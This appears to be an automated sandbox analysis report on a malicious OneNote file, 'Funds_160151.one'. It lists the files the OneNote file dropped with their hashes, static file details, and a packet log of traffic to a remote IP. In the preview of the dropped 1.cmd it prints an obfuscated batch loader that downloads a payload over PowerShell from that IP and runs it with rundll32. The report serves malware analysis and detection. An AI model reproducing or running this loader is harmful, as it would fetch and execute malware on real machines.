Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	5040
Entropy (8bit):	1.039401435531079
Encrypted:	false
SSDEEP:	12:RaREzTjYyfHjZhUnSPXl2SFFBtlP3W6/KJICPc1I81XIxAS:YREzHYyfH4SYEtlP38ICkF1CAS
MD5:	6441197E02110D54CB44BF7E75A9ADAF
SHA1:	28502B8C9FF75282C739B27858AB669FC1314341
SHA-256:	22225409E75324F6C71BA4CB8AFBBD9F2566E7FA280D42A940690CB4CE07E310
SHA-512:	62566FD4601726FCE91488D2EE2A386B26CFB3B7DF59F9E30ED919938393769D33FDFD0E04EC3E01C7C79F378095C7FADD439EF28E4FD4C2F8B905A969584968
Malicious:	false
Preview:	./.C..vL....W"v_...2T.O@....V.U.................?.....I..........................................................................':.M..E..._A.......................h.............................................Qgy.M.tJ.w8L.........f..J...N..&.u.. ............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Word Document Building Blocks\Open Notebook.onetoc2

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	1.2249766620366154
Encrypted:	false
SSDEEP:	24:YgYyfclIJA+txfvxMcPcCAScgEzwla7bLre:LnclIJAWHD7EMg7bLq
MD5:	CE9D9C97998115F95AD1B075CF633D33
SHA1:	FE7E12DBE61C1957525892FE117226230801F688
SHA-256:	CD25781BC30639790DDFD1059372E1F36895D31C90CF9C6AEC6B7094409C4B59
SHA-512:	72528D2FF5E748CCD0B7B6954F5760F27962F95ADBA3CD516AF56F58FC2739CD7A2DED2EDB9DB1F73C5E637795AAF81B7076EA12A5E94B242C8D8016117EC5C6
Malicious:	false
Preview:	./.C..vL....W"v_...':.M..E..._................?.....I.......................................................................saC....L...e..........................h.............................................$n.`.O....c`i...........!...A..kG!&R.............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\Open Notebook.onetoc2

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	1.2370402102690354
Encrypted:	false
SSDEEP:	12:Ra7YyfiWqR/UXSHwhGNFFBtMAWn+J/Ss0JYKoB+eAXIxASDk1nSLilAJ+disnIB:Y7YyficiHwhetJfv0p5eACAScnSGAVse
MD5:	B39F36C15E8091E5AB04F9877EFA2AB7
SHA1:	A88DFFD03ED6C1EEF884F2D2DE8D938DEA33211E
SHA-256:	65DE75B6E457CC9A6F155EF7C12B854A4F8E4ADE794A7A20ECF7C7104ECE7736
SHA-512:	E703474B0B80EAB756A2FE6A40AB30DB45F6960432CEABFB8C03BA639CAA367C2EE31594AC672030F46A1DBAA6AD0A5B6A726E21FF9CEAF2B5C34FF2F49EDA8C
Malicious:	false
Preview:	./.C..vL....W"v_.T.t..E...#.9.C................?.....I.........................................................................s./.I.,.Xy..c...7....................h..................................................B...z ............pR..(L..P.M&..............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Templates\Open Notebook.onetoc2

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	6168
Entropy (8bit):	1.213518097445612
Encrypted:	false
SSDEEP:	12:RakxmkYyfi/UPWFulruFFBt9Wn+J/eQ4/i9nr33XIxASh16DwVHQx6r6ghC/kICe:YkxBYyf1Dat9foQWM33CASPdVHQsox
MD5:	B513141BDF5ABAC34160B695B0D2E95A
SHA1:	7A2B58A8C7B6A19F59BB16B3225D6E9C3AAF893C
SHA-256:	4273C5E687311622981B5062B5C52D9D86446BD6A540FE1F8004173B835581CD
SHA-512:	E42A40913495A0003F378F6B6F8CA3AC6A389A1DD66476E697D8246C4A9C79F94E62B94E7B8B8D4718344C8F201552480A00A002B480B711C387F498BBE5EF15
Malicious:	false
Preview:	./.C..vL....W"v_..s./.I.,.Xy..c................?.....I...............................................................................................................h...........................................=....F..-B............4.~/..L...................................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1bc9bbbe61f14501.customDestinations-ms (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4011
Entropy (8bit):	3.526693535710076
Encrypted:	false
SSDEEP:	48:/vzdVfJtFCfMdN5DMJC5LjdildVfJKrtB6/ckydNZGcG7CZWB0/gA:/TfQWMwEdfJKu59j4/
MD5:	5CE1FF7DD98A2AA19E68044602D3689B
SHA1:	320CB0D3BCEF7C38739A6EB147A3B9E81F108D4D
SHA-256:	B60DC5881DF4C7269A70C487E135BE9E3460C62589824E025EB2041AA418B525
SHA-512:	A55FBB712F99CDBBA8D172E74FFB10711F92BC90077FBC11876A21D338B05C41E67819A038E605803C1143D278862FA41252CA99BB33F327739F0A076FE82544
Malicious:	false
Preview:	...................................FL..................F.@.. ...../.......u./;..../.....H]$...................../....P.O. .:i.....+00.../C:\.....................1.....6Sto..PROGRA~1..t......O.IGV6......o..............J.......4.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....j.1.....6S.S..MICROS~2..R......6S.S6S.S....y2........................M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.....N.1.....6S.S..root..:......6S.SGV9......"....................x...r.o.o.t.....Z.1.....6S.S..Office16..B......6S.SGVA.....@1.....................D..O.f.f.i.c.e.1.6.....b.2.H]$.6S.S .ONENOTE.EXE.H......6S.SGV@......!.....................p..O.N.E.N.O.T.E...E.X.E.......j...............-.......i...........[........C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE....(.W.i.n.d.o.w.s. .+. .A.l.t. .+. .N.).../.s.i.d.e.n.o.t.e.;.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.R.o.o.t.\.O.f.f.i.c.e.1.6.\.O.N.E.N.O.T.E...E.X.E.........%ProgramFiles%\Microsoft Office\R

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1bc9bbbe61f14501.customDestinations-ms~RF4246c.TMP (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4011
Entropy (8bit):	3.526693535710076
Encrypted:	false
SSDEEP:	48:/vzdVfJtFCfMdN5DMJC5LjdildVfJKrtB6/ckydNZGcG7CZWB0/gA:/TfQWMwEdfJKu59j4/
MD5:	5CE1FF7DD98A2AA19E68044602D3689B
SHA1:	320CB0D3BCEF7C38739A6EB147A3B9E81F108D4D
SHA-256:	B60DC5881DF4C7269A70C487E135BE9E3460C62589824E025EB2041AA418B525
SHA-512:	A55FBB712F99CDBBA8D172E74FFB10711F92BC90077FBC11876A21D338B05C41E67819A038E605803C1143D278862FA41252CA99BB33F327739F0A076FE82544
Malicious:	false
Preview:	...................................FL..................F.@.. ...../.......u./;..../.....H]$...................../....P.O. .:i.....+00.../C:\.....................1.....6Sto..PROGRA~1..t......O.IGV6......o..............J.......4.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....j.1.....6S.S..MICROS~2..R......6S.S6S.S....y2........................M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.....N.1.....6S.S..root..:......6S.SGV9......"....................x...r.o.o.t.....Z.1.....6S.S..Office16..B......6S.SGVA.....@1.....................D..O.f.f.i.c.e.1.6.....b.2.H]$.6S.S .ONENOTE.EXE.H......6S.SGV@......!.....................p..O.N.E.N.O.T.E...E.X.E.......j...............-.......i...........[........C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE....(.W.i.n.d.o.w.s. .+. .A.l.t. .+. .N.).../.s.i.d.e.n.o.t.e.;.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.R.o.o.t.\.O.f.f.i.c.e.1.6.\.O.N.E.N.O.T.E...E.X.E.........%ProgramFiles%\Microsoft Office\R

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6GXMU512HZTVYEZDXRLJ.temp

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4011
Entropy (8bit):	3.526693535710076
Encrypted:	false
SSDEEP:	48:/vzdVfJtFCfMdN5DMJC5LjdildVfJKrtB6/ckydNZGcG7CZWB0/gA:/TfQWMwEdfJKu59j4/
MD5:	5CE1FF7DD98A2AA19E68044602D3689B
SHA1:	320CB0D3BCEF7C38739A6EB147A3B9E81F108D4D
SHA-256:	B60DC5881DF4C7269A70C487E135BE9E3460C62589824E025EB2041AA418B525
SHA-512:	A55FBB712F99CDBBA8D172E74FFB10711F92BC90077FBC11876A21D338B05C41E67819A038E605803C1143D278862FA41252CA99BB33F327739F0A076FE82544
Malicious:	false
Preview:	...................................FL..................F.@.. ...../.......u./;..../.....H]$...................../....P.O. .:i.....+00.../C:\.....................1.....6Sto..PROGRA~1..t......O.IGV6......o..............J.......4.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....j.1.....6S.S..MICROS~2..R......6S.S6S.S....y2........................M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.....N.1.....6S.S..root..:......6S.SGV9......"....................x...r.o.o.t.....Z.1.....6S.S..Office16..B......6S.SGVA.....@1.....................D..O.f.f.i.c.e.1.6.....b.2.H]$.6S.S .ONENOTE.EXE.H......6S.SGV@......!.....................p..O.N.E.N.O.T.E...E.X.E.......j...............-.......i...........[........C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE....(.W.i.n.d.o.w.s. .+. .A.l.t. .+. .N.).../.s.i.d.e.n.o.t.e.;.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.R.o.o.t.\.O.f.f.i.c.e.1.6.\.O.N.E.N.O.T.E...E.X.E.........%ProgramFiles%\Microsoft Office\R

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EIB5VIB2WA8LTFMLYOAT.temp

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	Matlab v4 mat-file (little endian) \253\373\277\272, sparse, rows 1, columns 0, imaginary
Category:	dropped
Size (bytes):	24
Entropy (8bit):	2.163890986728065
Encrypted:	false
SSDEEP:	3:/lklT8OFf:CT8Ol
MD5:	4FCB2A3EE025E4A10D21E1B154873FE2
SHA1:	57658E2FA594B7D0B99D02E041D0F3418E58856B
SHA-256:	90BF6BAA6F968A285F88620FBF91E1F5AA3E66E2BAD50FD16F37913280AD8228
SHA-512:	4E85D48DB8C0EE5C4DD4149AB01D33E4224456C3F3E3B0101544A5CA87A0D74B3CCD8C0509650008E2ABED65EFD1E140B1E65AE5215AB32DE6F6A49C9D3EC3FF
Malicious:	false
Preview:	........................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Archive, Sparse, ctime=Wed Sep 22 09:27:59 2021, mtime=Tue Feb 7 19:02:00 2023, atime=Wed Sep 22 09:27:59 2021, length=180528, window=hide
Category:	dropped
Size (bytes):	1314
Entropy (8bit):	4.605665960395214
Encrypted:	false
SSDEEP:	24:8Jx0dVKuJKIMNhKtCBY8AM+cFUKdNZhxoJHyCTGhTGLJTvm:8J6dVfJKrtBs/cF5dNZJB0lTv
MD5:	30DBF9A635259A43876DE1F0E570484F
SHA1:	9B747FCBE55ADF0BD390B0A1F174189F44C75667
SHA-256:	FB6AC4FC3C5E2B4A0D7A1E84ACB408BEB2153B03138DC27684BD01EDA6933FD0
SHA-512:	AF6D771BF519B35A23A623C99D3CE7B7D4FEE8D89D24BBEBBFABEA9D876D42E81FA23EF7DFF3BD6746FFFC05224A648DA7D592F9854EAB590A4812CACABCEB0D
Malicious:	false
Preview:	L..................F.... ...../......ir./;..../.....0.......................3....P.O. .:i.....+00.../C:\.....................1.....6Sto..PROGRA~1..t......O.IGV6......o..............J.......4.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....j.1.....6S.S..MICROS~2..R......6S.SGVA.....y2........................M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.....N.1.....6S.S..root..:......6S.SGV9......"....................x...r.o.o.t.....Z.1.....6S.S..Office16..B......6S.SGVA.....@1.....................D..O.f.f.i.c.e.1.6.....f.2.0...6S.S .ONENOTEM.EXE..J......6S.SGVA......!.....................p..O.N.E.N.O.T.E.M...E.X.E.......k...............-.......j...........[........C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE....S.e.n.d. .t.o. .O.n.e.N.o.t.e.T.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.r.o.o.t.\.O.f.f.i.c.e.1.6.\.O.N.E.N.O.T.E.M...E.X.E.../.t.s.r.........&................c^...NI..e.2...

C:\Users\user\Documents\OneNote Notebooks\My Notebook\Open Notebook.onetoc2

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	6184
Entropy (8bit):	1.2269585205775393
Encrypted:	false
SSDEEP:	24:YEzk7Yyf1CmtztXfMoWqQ3fvSoOCAS0Vt0V0Qt9:vmn13LXQ3yMYXQt9
MD5:	02C986D44D8D0CFB219990D5BEF8D6F0
SHA1:	EDCCE8694EAFE5CAC5F9E776793AAE316A83729B
SHA-256:	2B69FAC91A84113BD1D171A3FB47315831B46A34BD024947D88BE8FE91B6F442
SHA-512:	9748E82888A2C080AF1E243B20B99560400B58222D4D24C7C483EF83C1144742D3F93258448D569E156581E8BE1FBBE09A662F1702E19A6FC1A226C8E03AB046
Malicious:	false
Preview:	./.C..vL....W"v_f.v.H.^E..Y...................?.....I...............................................................................................................h...........................(...............D;....QI....S...........*.$K.4.J..S.. ..............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\OneNote Notebooks\My Notebook\Quick Notes.one

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	5272
Entropy (8bit):	1.3370972641773036
Encrypted:	false
SSDEEP:	12:cvBObYyfnjyokF2UP6mjT+cFFBtyh1hVVstO/HhBPhoA9QKSPybONz996IjuC:cuYyfnpkbimjTztqst8z9U6bONPZx
MD5:	0C4114984D40D23F4195D91250FB7BE9
SHA1:	201DB5386120BC9D5FBFECCF099674CAD24A8342
SHA-256:	8F8424388BB44051DC38D60DB778AFA73BE00CA5B6BED0631EE1F88F37639854
SHA-512:	6BADB81098FBC1FF595B3174596AE86F9B08B14D26CC1380AEFAA29088D7FD54E8F12D76DF7820A45A301BA2D9B6A83D9A4D6295FCAC9663FA945239E716A4FA
Malicious:	false
Preview:	.R\{..M..Sx.)..to..s..J.\Q.....................?.....I...................................................................f.v.H.^E..Y...0.......................h................................................L.J."..............'...q.O..4...t.............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\Public\1.cmd

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	288
Entropy (8bit):	5.556030853815853
Encrypted:	false
SSDEEP:	6:0mRtCbOTV6Fh0xu0ztGwmKiTtLyH4sF1LBYVtMVJQRrn:r4WkFixuwt7mKiT5QBYjFr
MD5:	E7DBD9F8F32E22345F02041C2DF0761C
SHA1:	8DB8867244CDDC64058BADCB5AD4EE194E35D90D
SHA-256:	52381BBF5F8BDEC3DB45E073F8EC2BBA8D9DE9C107864C291C31D169C47FC04E
SHA-512:	9064C9F0FA4060A4E6282F12ECB8207A20D13C593A76EC00F0DFB50DF86948A30296BFEF4FDE328761934568B1076A56553B76FE13DA819964AD5AFE8E56BAF6
Malicious:	true
Yara Hits:	Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: C:\Users\Public\1.cmd, Author: Florian Roth (Nextron Systems)
Preview:	..@echo off..set a1yJDRLQ=axvgsK..set aLQuCRy5=aHnBdUM2..set aFdizIkDt=abPS5q..powershell (new-object system.net.webclient).downloadfile('http://87.236.146.31/38199.dat', 'C:\programdata\gb.jpg');..set agMae3pC=ayau3..set amPtUMcA=aRZje..call ru%1ll32 C:\programdata\gb.jpg,Wind..exit....

Static File Info

General

File type:	data
Entropy (8bit):	5.741485055426205
TrID:	Microsoft OneNote note (16024/2) 100.00%
File name:	Funds_160151.one
File size:	175076
MD5:	28e7fc5ae92342890d6544eb123f1b39
SHA1:	8855057b6acb24949315098ace002c99048efd10
SHA256:	2c2e8ec868c8b50a2f7a59d9948a82a9031301dfb7c41651eb35e158fedf190b
SHA512:	8d3dc8d1e1175a022f727d479b5548234648aff19c8604a83bffdfb5f248c76e970f3355bab50261c21cce74d44ae3591ce0e438ebabe8179b517e6eea02b148
SSDEEP:	3072:YWgS2EJbyYeMYkKkyX3DWvLLATiFwvujHCRg1n:ohjZrHDgIujHd1
TLSH:	6F04CF06B2D28659C7681A750CFB6F74F367BE2291A1572F9EB62A2C4DF0244CC1139F
File Content Preview:	.R\{...M..Sx.)....V.Lz.B......g.................?......I.........................................................................................N..................h.......................0.....................r ..7L.r....V#`...........'..J.n.........

File Icon


Icon Hash:	d4dce0626664606c

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 7, 2023 20:02:06.379864931 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.401489973 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.401655912 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.401859045 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.422679901 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.577481985 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.577510118 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.577533007 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.577553034 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.577574015 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.577594995 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.577613115 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.577632904 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.577653885 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.577826023 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.577826023 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.577970982 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.599071026 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.599098921 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.599119902 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.599140882 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.599160910 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.599181890 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.599203110 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.599222898 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.599244118 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.599280119 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.599301100 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.599322081 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.599343061 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.599364042 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.599385023 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.599392891 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.599392891 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.599406004 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.599426985 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.599442959 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.599560976 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.599735022 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.599735022 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.615858078 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.616066933 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.620513916 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.620661974 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.620676041 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.620778084 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.620800972 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.620827913 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.620840073 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.620851040 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.620862007 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.620872974 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.620882988 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.620893955 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.620904922 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.620914936 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.620925903 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.620951891 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.620951891 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.621119022 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.621208906 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.621222019 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.621232033 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.621243000 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.621253014 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.621263981 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.621298075 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.621306896 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.621309042 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.621309996 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.621328115 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.621478081 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.621488094 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.621490002 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.621490955 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.621490955 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.621491909 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.621491909 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.621493101 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.621493101 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.621615887 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.621629953 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.621630907 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.621640921 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.621768951 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.621768951 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.621970892 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.642049074 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.642209053 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.642227888 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.642241955 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.642256975 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.642271042 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.642283916 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.642297983 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.642312050 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.642326117 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.642343998 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.642369032 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.642394066 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.642421007 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.642479897 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.642479897 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.642683983 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.642844915 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.652031898 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.652066946 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.652204990 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.652224064 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.652245998 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.652266979 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.652287006 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.652319908 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.652349949 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.652378082 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.652406931 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.652415037 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.652436018 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.652463913 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.652492046 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.652519941 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.652549982 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.652580976 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.652585030 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.652585983 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.652611971 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.652642965 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.652662992 CET	80	49801	87.236.146.31	192.168.11.20
